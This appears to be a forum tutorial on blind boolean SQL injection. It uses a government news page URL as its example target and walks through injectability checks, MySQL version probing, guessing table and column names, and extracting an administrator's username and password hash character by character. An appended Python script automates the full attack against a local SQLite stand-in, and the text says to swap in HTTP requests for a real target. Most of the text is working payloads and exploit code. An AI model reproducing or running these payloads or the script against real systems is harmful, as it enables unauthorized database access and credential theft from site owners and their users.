because this is a whole different story.
1. test for vulnerability
so you have a site, let's say:
Code:
www.cia.gov/news.php?id=1
just like a normal mysql injection, but for blind you put:
Code:
www.cia.gov/news.php?id=1 and 1=2
if some text from the page goes missing, or you get an error message like "invalid id" or a raw db_error that echoes part of the query, then it's vuln.
this works because 1=2 is always false, so the WHERE clause matches nothing and the page has nothing to show.
you see, if instead it was:
Code:
www.cia.gov/news.php?id=1 and 1=1
then you would get the normal page, because 1=1 is always true.
the pair of requests is the whole trick: every question you ask the database from now on is answered only by "normal page" (true) or "broken page" (false).
2. mysql version
to find the mysql version you compare the first character of @@version, one digit at a time:
Code:
www.cia.gov/news.php?id=1 and substring(@@version,1,1)=4
if the page comes back true (normal) then the version is 4. if not, try:
Code:
www.cia.gov/news.php?id=1 and substring(@@version,1,1)=5
if that comes back true then it's version 5.
(mysql casts the digit for you, so =4 and ='4' behave the same; the version matters because from 5 onwards information_schema exists and you can read table names from it instead of guessing them in the next step.)
3. fuzzing tables and columns
to find the table name you need to guess it, so here is the query:
Code:
www.cia.gov/news.php?id=1 and (SELECT 1 from admin limit 0,1)=1
here I have guessed the table admin. if the page loads true then the table exists; if the table doesn't exist the query errors and the page comes back false.
eg. the real table name is administrator, and we try:
Code:
www.cia.gov/news.php?id=1 and (SELECT 1 from users limit 0,1)=1
then it returns an error a.k.a. false, but if we do:
Code:
www.cia.gov/news.php?id=1 and (SELECT 1 from administrator limit 0,1)=1
then it does not error a.k.a. true.
(one catch: if the table exists but has no rows the subquery returns NULL, and NULL=1 also reads as false.)
now for the column. so the table is administrator, we found that by fuzzing, and now we need the column name. we fuzz it with:
Code:
www.cia.gov/news.php?id=1 and (SELECT substring(concat(1,password),1,1) from administrator limit 0,1)=1
if the column password exists the subquery returns '1' and the page loads normally; if it doesn't exist the query errors. the concat(1,...) is there so the compare still works when the column value is empty.
you get my drift...
4. extracting password with ascii
so now we have the table/column we need to extract. well as you know it won't just pop up on the screen, so we pull it out one character at a time by comparing its ascii code against a number.
note the subquery is concat(username,0x3a,password), so you are reading the string "username:password": the first characters are the username, and the password comes after the colon (0x3a).
Code:
www.cia.gov/news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from administrator where userid=2),1,1))>99
if this returns true (normal page) then the first character is greater than 99 and you need to go higher
Code:
www.cia.gov/news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from administrator where userid=2),1,1))>103
if this errors (false) then it's not greater than 103, so it's somewhere in 100 to 103
now try
Code:
www.cia.gov/news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from administrator where userid=2),1,1))>101
error, so it's greater than 99 but not greater than 101, i.e. 100 or 101
lower
Code:
www.cia.gov/news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from administrator where userid=2),1,1))>100
error, so it's greater than 99 but not greater than 100, making it 100
the first character is 100, which if you put into an ascii converter you will see is the letter d
(every answer halves what's left, so start in the middle of the printable range, e.g. >64, and you need about seven requests per character instead of walking up one number at a time)
now you need to find the next character
Code:
www.cia.gov/news.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from administrator where userid=2),2,1))>60
notice how I did userid=2),2,1))>60 instead of 1,1, so this will be doing the second character
so keep extracting characters until every comparison comes back false: once you run past the end of the string substring() returns '' and ascii('') is 0, so even >0 is false
then you will have the hash / password.
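the four steps above, as an added example that is not part of the original post: an in-memory SQLite database stands in for news.php (the site, the table administrator, its columns and the two rows are all assumed for the demo), the id parameter is concatenated straight into the query exactly like the vulnerable page, and every payload goes through the same true/false oracle. the payloads use the SQLite spellings (substr, unicode, ||, sqlite_version) of the mysql functions used above (substring, ascii, concat, @@version). it goes one step further than the post and finds each character by binary search instead of walking the ascii codes one at a time.

```python
import sqlite3

# Constructed stand-in for the target: an in-memory SQLite database plays
# news.php. Table, column names and rows are assumed for the demo.
def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news(id INTEGER, title TEXT);
        INSERT INTO news VALUES (1, 'Welcome'), (2, 'Archive');
        CREATE TABLE administrator(userid INTEGER, username TEXT, password TEXT);
        INSERT INTO administrator VALUES (1, 'root', 'a1b2c3'), (2, 'dave', 'd41d8cd9');
    """)
    return db

def vulnerable_page(db, id_param):
    """news.php?id=<id_param>. The id is concatenated straight into the SQL,
    which is the whole bug. Returns the page text; '' stands for both 'the
    normal text went missing' and a database error page."""
    try:
        rows = db.execute("SELECT title FROM news WHERE id=" + id_param).fetchall()
    except sqlite3.Error:
        return ""
    return rows[0][0] if rows else ""

def oracle(db, condition):
    """True when 'id=1 and (<condition>)' still renders the normal page."""
    return vulnerable_page(db, "1 and (" + condition + ")") == vulnerable_page(db, "1")

# step 1: 1=1 keeps the page, 1=2 breaks it
def is_injectable(db):
    return oracle(db, "1=1") and not oracle(db, "1=2")

# step 2: compare the first character of the version string, digit by digit
# (MySQL: substring(@@version,1,1)=N; SQLite has sqlite_version() instead)
def version_major(db):
    for digit in range(10):
        if oracle(db, "substr(sqlite_version(),1,1)='%d'" % digit):
            return digit
    return None

# step 3: a missing table or column makes the query error -> page false
def table_exists(db, table):
    return oracle(db, "(SELECT 1 FROM %s LIMIT 0,1)=1" % table)

def column_exists(db, table, column):
    # 1||col keeps the subquery non-empty even if the column value is '';
    # SQLite compares text strictly, so the right-hand side is '1', not 1
    return oracle(db, "(SELECT substr(1||%s,1,1) FROM %s LIMIT 0,1)='1'" % (column, table))

# step 4: read one character code by binary search over 0..127
def char_at(db, subquery, pos, lo=0, hi=127):
    """MySQL spelling of the payload: ascii(substring((subquery),pos,1))>mid.
    Past the end of the string substr() yields '' and unicode('') is NULL, so
    every '>' test is false and 0 comes back: that is the stop signal."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(db, "unicode(substr((%s),%d,1))>%d" % (subquery, pos, mid)):
            lo = mid + 1      # character is above mid
        else:
            hi = mid          # character is mid or below
    return lo

def extract(db, subquery, max_len=64):
    out = []
    for pos in range(1, max_len + 1):
        code = char_at(db, subquery, pos)
        if code == 0:
            break
        out.append(chr(code))
    return "".join(out)

# the post's concat(username,0x3a,password) subquery, SQLite spelling
CREDS = "SELECT username||':'||password FROM administrator WHERE userid=2"

if __name__ == "__main__":
    db = build_db()
    print("injectable:", is_injectable(db))
    print("version:", version_major(db))
    print("table administrator:", table_exists(db, "administrator"),
          "| users:", table_exists(db, "users"))
    print("column password:", column_exists(db, "administrator", "password"))
    print("userid 2 ->", extract(db, CREDS))
```

against a real target you would replace vulnerable_page() with an HTTP request and compare the response body (or its length) to the baseline page; everything else stays the same. seven requests per character is the cost of the binary search, against up to 127 for the one-at-a-time walk.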